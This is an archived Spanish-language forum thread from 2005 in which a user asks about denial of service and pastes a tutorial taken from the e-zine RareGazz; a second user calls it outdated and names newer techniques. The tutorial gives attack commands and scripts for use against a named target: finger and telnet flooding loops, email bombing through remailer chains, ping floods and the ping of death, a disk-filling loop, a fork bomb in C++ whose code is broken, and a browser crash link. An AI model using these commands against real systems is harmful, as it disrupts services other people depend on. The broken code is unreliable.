PDA

Ver la versión completa : DoS



Doe182
05-06-2005, 05:26
¿De ke trata la dengación de servicios?...¿Como se aplica a un servidor?

Gracias de antemano, Saludos!!!!

Doe182
14-07-2005, 03:25
No entiendo por qué nadie me respondio pero encontré un buen tutorial sobre el tema y acá lo pongo...
-----------------------------------------------------------------------------------

OBJETIVOS BASICOS DE UN ATAQUE
==============================

1.Espacio swap
~~~~~~~~~~~~~~
La mayoria de los sistemas tienen cientos de megabytes reservados al espacio
swap para resolver las peticiones del cliente. El espacio swap es tipicamente
usado para forjar procesos menores que tienen un periodo de vida corto. Asi
pues el espacio swap bajo ninguna causa debera ser usado rigurosamente. Una
negacion de servicio podria estar basada en un metodo que trate de llenar el
espacio swap.

2.Tablas del Kernel
~~~~~~~~~~~~~~~~~~~
Es trivial sobrecargar las tablas del kernel para ocasionar serios problemas
al sistema. Los sistemas que escriben a traves de caches y buffers pequeños
son especialmente sensitivos.

Otro objetivo susceptible es el kernel memory allocation. Todo Kernel o
cerebro tiene un limite para la memoria en su mapa de memoria, si el sistema
alcanza este limite el cerebro no puede colocar mas memoria y el sistema debe
ser reboteado. La memorial del kernel no solo es usada para procesos del
CPU, monitores y asi, pero tambien para procesos ordinarios lo que significa
que cualquier sistema puede ser estrellado con un buen algoritmo lo bastante
rapido. [ trucos disponibles en numeros anteriores de la revista :) ]

3. RAM
~~~~~~
Una negacion del servicio que ocupe grandes cantidades de RAM puede ocasionar
bastantes problemas. NFS y servidores de correo con extremadamente sensitivos
porque casi nunca ocupan mucho RAM por lo tanto tienen poco RAM asignado. Un
ataque a un servidor NFS es comun. El cliente de NFS normal puede hacer mucho
uso del cache, pero un cliente NFS puede ser cualquier programa inclusive uno
que hayas escrito tu mismo...

4. Discos
~~~~~~~~~
Un ataque clasico es llenar el disco duro.


ATACANDO DESDE FUERA
====================

Usando finger
~~~~~~~~~~~~~
La mayoria de las instalaciones de fingerd dejan redireccionar a otro host.
Ejemplo:

$finger @[email protected]

Finger en el ejemplo tendra que ir a traves del sistema.uno.com y despues al
sistema.dos.com. Todo lo que el sistema.dos.com sabe es que el
sistema.uno.com esta contactandole usando finger. Este metodo puede ser usado
para esconderte, pero tambien para hacer uso de un truco sucio. Ejemplo:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.que.atacamo s.com

Todos esos signos @ ocasionaran que finger llame a host.que.atacamos.com una
y otra vez... El efecto es desastroso para host.que.atacamos.com resultando
en un uso alto del ancho de banda, falta de memoria y un disco duro con menos
espacio debido a todos los procesos creados.

La solucion es instalar un fingerd que no soporte redirecciones, por ejemplo
el finger GNU. Tambien puedes desinstalar el servicio finger.

Usando telnet
~~~~~~~~~~~~~
Examina este script:

while : ; do
telnet sistema.que.atacamos.com &
done

Un ataque de este tipo comera algo del ancho de banda pero no es nada
comparado con el metodo fingerd. El punto es que algunas firewalls y httpd:s
piensan que el ataque es una loop y se apagan automaticamente hasta que el
administrador mate el proceso con kill -HUP

Broadcast Storms
~~~~~~~~~~~~~~~~
Este es un metodo muy popular en la redes donde todos los hosts actuan como
gateways.
Existen muchas versiones del ataque pero el metodo basico es mandar muchos
paquetes a todos los hosts de la red con una direccion destino inexistente.
Cada host tratara de mandar los paquetes asi que estos `rebotaran' por la red
un buen rato.

Los servicios que pueden ser abusados para hacer esto son ping, finger y
sendmail.

Email Bombing
~~~~~~~~~~~~~
En un ataque de email se envian muchos mensajes identicos a una o muchas
direcciones del host. El efecto en el objetivo es un alto uso del ancho
de banda y menos espacio en disco... Cuando envias muchos mensajes a una
direccion inexistente del host desde otra inexistente un mensaje se
convertira en 3 y regresara para convertirse en 3 de nuevo y asi... Por
mas odioso que se vea este ataque es bastante efectivo y aun no es ilegal
en muchos paises latinoamericanos y europeos.

Ejemplo:
Envia un mail de 100k a [email protected] desde una direccion que
no exista como [email protected]
Cuando el mensaje llege a host.atacado.com como no existe la direccion
noexiste regresara el mensaje a [email protected] y como esta
direccion tampoco existe ... regresara ahora como un mensaje de 300k y asi...

Otra forma de abusar el email y servidores norteamericanos es juntar varios
remailers. Por ejemplo:
Suponiendo que tenemos nosotros una cuenta en Geocities. Digamos
[email protected] y le decimos que queremos que el mail que llegue a esa
direccion lo mande a [email protected]. Ahora en la cuenta [email protected]
le decimos que lo mande a [email protected]. Y en la cuenta [email protected] le
decimos que lo mande a [email protected] ... Despues mandamos un mega o dos
a [email protected] que lo mandara a [email protected] y de ahi a
[email protected] y de nuevo a [email protected] ... este ataque es lame si
en vez de un mega mandas unos 5 !! En fin, espera represalias si te animas
a hacerlo.


Abuso del FTP anonimo
~~~~~~~~~~~~~~~~~~~~~
Si un servidor FTP anonimo tiene un area que pueda ser escrita puede ser
abusada para un ataque de negacion del servicio. Obviamente el objeto seria
llenar el disco duro.

SYN FLOODING
~~~~~~~~~~~~
El mas famoso de los ataques del tipo denial of service. Phrack y 2600 han
publicado extensos articulos sobre este ataque y codigo para hacerlo.

El ataque se basa en un saludo entre dos hosts incompleto. El host hostil
envia un paquete SYN pero no responde al paquete ACK ocasionando que el
stack TCP/IP espere cierta cantidad de tiempo a que el host hostil responda
antes de cerrar la conexion. Si creamos muchas peticiones de conexion y
no se responde a ninguna el host estara inactivo mucho tiempo esperando
respuesta ocasionando lentitud en los demas servicios.

Ping Flooding
~~~~~~~~~~~~~
Este metodo tiene un gran efecto en el sistema atacado.

Bajo Unix nosotros podriamos intentar algo como: ping -s host
para mandar paquetes de 64 bytes.

Si tienes Windows 95, has click en start, elige run y escribe:
PING -T -L 256 host.que.atacamos.com y comienza 15 sesiones iguales.


Crashing usando Ping
~~~~~~~~~~~~~~~~~~~~
Para detener a un sistema desde una maquina corriendo Windows 95 simplemente
ejecuta:

ping -l 65510 host.que.atacamos.com

Y el sistema se detendra o se re-iniciara.


ATACANDO DESDE DENTRO
=====================

Llenando el disco duro
~~~~~~~~~~~~~~~~~~~~~~~

Si en tu sistema puedes usar el directorio temporal /tmp - /temp /pub/tmp -
pub/temp - pub/incoming o /incoming entonces es posible que llenes el disco
usando un script parecido a este:

while : ;
mkdir .xxx
cd .xxx
done


Uso malicioso de fork()
~~~~~~~~~~~~~~~~~~~~~~~
Si alguien ejecuta este programa C++ el resultado sera un crash en la mayoria
de los sistemas.

#include <sys/types.h>
#include <unistd.h>
#include <iostream.h>

main()
{
int x;
while(x=0;x<1000000;x++)
{
system("uptime");
fork();
}
}


Para generar un ataque mas sangriento puedes cambiar el comando uptime por
sync.

Crear archivos dificiles de remover
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Todos los archivos pueden ser borrados pero aqui hay algunos dificiles:
( $ simboliza el prompt, ^C es igual a CTRL + C. )

1.-
$ cat > -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$

2.-
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$


Ataque CSH
~~~~~~~~~~
Ejecuta esto bajo /bin/csh despues de modificarlo con el path propio del
shell csh de tu sistema. Busca este path en tu archivo .login

|I /bin/csh
nodename : **************b


DUMPING CORE
============

Uso malicioso de Netscape
~~~~~~~~~~~~~~~~~~~~~~~~~
Bajo Netscape 1.1N este link resultara en un fault de segmentacion y el
sistema arrojara el core.

<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xx x.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xx x.xxxxxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx .xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx .xxx.xxx.xxx.xxx.
xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>

[email protected]

----------------------------------------------------------------

Sacado del e-zine RareGazz nº 8

morza2
16-07-2005, 01:21
NO esta mal, aunque un poco desactualizado...mira lo del PING de la muerte, ya esta caduco hoy en dia.
Preferible hoy el envio de mensajes ICMP redirect, Corromper un cliente DNS, Datagramas fragmentados, usar ip y arp spoof, etc...